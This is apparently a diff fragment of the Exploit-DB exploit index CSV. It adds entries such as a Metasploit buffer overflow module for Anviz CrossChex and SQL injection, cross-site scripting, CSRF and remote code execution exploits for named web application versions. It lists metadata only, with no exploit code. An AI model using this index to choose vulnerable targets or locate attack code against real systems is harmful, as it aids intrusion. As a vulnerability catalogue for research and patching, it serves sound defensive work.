Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17999,6 +18005,7 @@ id,file,description,date,author,type,platform,port 48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25 48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows, +48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42358,3 +42365,11 @@ id,file,description,date,author,type,platform,port 48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80 48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php, 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php, +48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, +48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php, +48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware, +48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, +48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ashkan Moghaddas",webapps,php, +48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, +48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, +48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,